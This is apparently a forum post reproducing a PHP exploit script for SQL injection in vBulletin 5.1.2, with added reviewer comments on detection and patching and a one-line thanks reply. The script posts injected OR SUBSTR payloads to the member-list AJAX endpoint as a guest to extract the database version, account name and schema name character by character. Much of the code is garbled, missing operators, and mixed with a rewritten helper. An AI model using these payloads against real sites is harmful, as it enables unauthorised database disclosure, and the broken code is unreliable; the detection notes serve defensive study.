vBulletin 5.1.2 SQL Injection Exploit





PHP Kod:
<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


// NOTE(review): this listing lost "=" signs, commas and "." operators when the
// forum page was extracted (e.g. "'display_errors'1", "$expression str_replace"),
// so it does not parse as shown. Read it as a record of what the script sent,
// useful for building detections, not as runnable code.
error_reporting(E_ALL);
ini_set('display_errors'1);


// Get arguments
// The base URL comes from the first command-line argument; when none is given a
// hard-coded default is used.


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
// $expression is the base URL with every "/" replaced by "\/". The loops further
// down use it inside the explode() delimiter that is applied to the response.
$expression str_replace('/''\\/'$target_url);


// Function to send a POST request


/**
 * Send one HTTP POST with cURL and return whatever curl_exec() yields.
 *
 * NOTE(review): the listing lost "=" signs and commas during extraction
 * ("$ch curl_init", "$chCURLOPT_URL"), so this function does not parse as shown.
 *
 * Defensive notes:
 *  - CURLOPT_SSL_VERIFYPEER is set to false, so the peer certificate is not
 *    verified; any client code derived from this helper would accept an
 *    intercepted TLS connection.
 *  - The request headers are constants: a fixed Firefox/30.0 User-Agent, an
 *    "X-Requested-With: XMLHttpRequest" header, a Referer that always points at
 *    one host's /v5/memberlist regardless of $url, and a cookie with a constant
 *    bb_lastvisit value. A Referer host that differs from the requested host,
 *    together with that constant cookie, is a usable log/WAF signature for
 *    unmodified copies of this script.
 *
 * @param string $url    Full URL to post to.
 * @param string $params Request body handed to CURLOPT_POSTFIELDS (the callers in
 *                       this listing pass a URL-encoded string).
 * @return mixed The value returned by curl_exec().
 */
function httpPost($url,$params)
{
$ch curl_init($url);


curl_setopt($chCURLOPT_URL,$url);
curl_setopt($chCURLOPT_RETURNTRANSFER,true);
curl_setopt($chCURLOPT_HEADERfalse);
// Certificate verification is switched off on the next line.
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS$params);

// Static header set; see the signature note in the function header.
curl_setopt($chCURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output curl_exec($ch);

// Loose comparison: an empty response body is treated like a transport failure.
// The cURL error text is HTML-escaped before it is printed.
if(
$output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return 
$output;
}


// Function to get string between two other strings


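/**
 * Return the text that lies between the first occurrence of $start and the
 * next occurrence of $end after it.
 *
 * The listing as extracted had lost its commas and "=" signs; they are restored
 * here. Two behaviours are tightened compared with the original:
 *  - "not found" is detected with a strict === false check instead of the
 *    prepend-a-space / "== 0" trick;
 *  - when $end does not occur after $start the function returns "" instead of
 *    passing a negative length to substr(), which returned an unrelated slice.
 *
 * @param mixed $string Text to search; cast to string.
 * @param mixed $start  Opening marker; cast to string.
 * @param mixed $end    Closing marker; cast to string.
 * @return string The enclosed text, or "" when either marker is missing.
 */
function get_string_between($string, $start, $end)
{
    $haystack = (string) $string;
    $opening = (string) $start;
    $closing = (string) $end;

    // An empty opening marker never produced a match in the original either.
    if ($opening === '') {
        return '';
    }

    $from = strpos($haystack, $opening);
    if ($from === false) {
        return '';
    }
    $from += strlen($opening);

    // An empty closing marker yields an empty result, as before.
    if ($closing === '') {
        return '';
    }

    $to = strpos($haystack, $closing, $from);
    if ($to === false) {
        return '';
    }

    return substr($haystack, $from, $to - $from);
}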


// Get version
//
// NOTE(review): tokens were lost in extraction ("$result httpPost", "$letter 1"),
// so this section does not parse as shown.
//
// What the traffic looks like, for detection and triage:
//  - every request is a POST to <base>/ajax/render/memberlist_items with
//    "securitytoken=guest" in the body, i.e. presumably without a logged-in
//    session (confirm against the application);
//  - "criteria[startswith]" carries a double quote followed by SQL text
//    (OR, SUBSTR(, version(), a trailing "--"). A legitimate member-list filter
//    has no reason to contain any of these;
//  - one request is sent per output character, with the SUBSTR position
//    increasing by one each time, so a run shows up as a burst of near-identical
//    POSTs from one client.
// That the member list returned changes with the injected condition implies the
// parameter reaches the query unescaped. The fix belongs on the server: install
// the vendor's patched release for the 5.1.x line and bind or escape the
// "startswith" value; a WAF rule on the pattern above is a stop-gap only.


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print 
"Version: ";


$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 
,1)--+"+' 
.
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter 1;


// The loop ends once the response contains the application's
// "No Users Matched Your Query" message.
while(
strpos($result'No Users Matched Your Query') == false)
{
// The response is split on the member-link markup; the text of the first
// member link is then taken with get_string_between() and its first character
// is printed.
$exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression
'\/member\/'$result);


$username get_string_between($exploded[1], '">''<\/a>');
print 
$username[0];

// Next position; the request below differs from the previous one only in it.
$letter++;
$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' .
$letter ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user
//
// NOTE(review): tokens were lost in extraction, so this section does not parse
// as shown. It repeats the request pattern of the version section with user()
// in place of version(): POSTs to <base>/ajax/render/memberlist_items whose
// "criteria[startswith]" value contains a double quote, OR, SUBSTR( and a
// trailing "--", sent once per character position with "securitytoken=guest".
// Seeing user() in this parameter in request logs indicates an attempt to read
// the database account name; if that account turns out to be privileged, reduce
// it to the rights the forum needs as part of the clean-up.


print "\r\nUser: ";


$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 
,1)--+"+' 
.
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter 1;


// Runs until the response contains "No Users Matched Your Query".
while(
strpos($result'No Users Matched Your Query') == false)
{
// Split on the member-link markup, take the first link's text and print its
// first character.
$exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression
'\/member\/'$result);


$username get_string_between($exploded[1], '">''<\/a>');
print 
$username[0];


// Advance the SUBSTR position for the next request.
$letter++;
$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' $letter
',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database
//
// NOTE(review): tokens were lost in extraction, so this section does not parse
// as shown. It repeats the same request pattern with database(): POSTs to
// <base>/ajax/render/memberlist_items with "securitytoken=guest" and a
// "criteria[startswith]" value containing a double quote, OR, SUBSTR( and a
// trailing "--", one request per character position. The script as listed reads
// only three server values (version, account, schema name), but the same
// unescaped parameter would accept other expressions, so a confirmed hit in the
// logs should be handled as possible database disclosure, not as a banner probe.


print "\r\nDatabse: ";


$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 
1,1)--+"+' 
.
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter 1;


// Runs until the response contains "No Users Matched Your Query".
while(
strpos($result'No Users Matched Your Query') == false)
{
// Split on the member-link markup, take the first link's text and print its
// first character.
$exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression
'\/member\/'$result);


$username get_string_between($exploded[1], '">''<\/a>');
print 
$username[0];


// Advance the SUBSTR position for the next request.
$letter++;
$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' .
$letter ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Final line break after the last printed value.
print 
"\r\n"


?>
#2
Teşekkürler Hocam.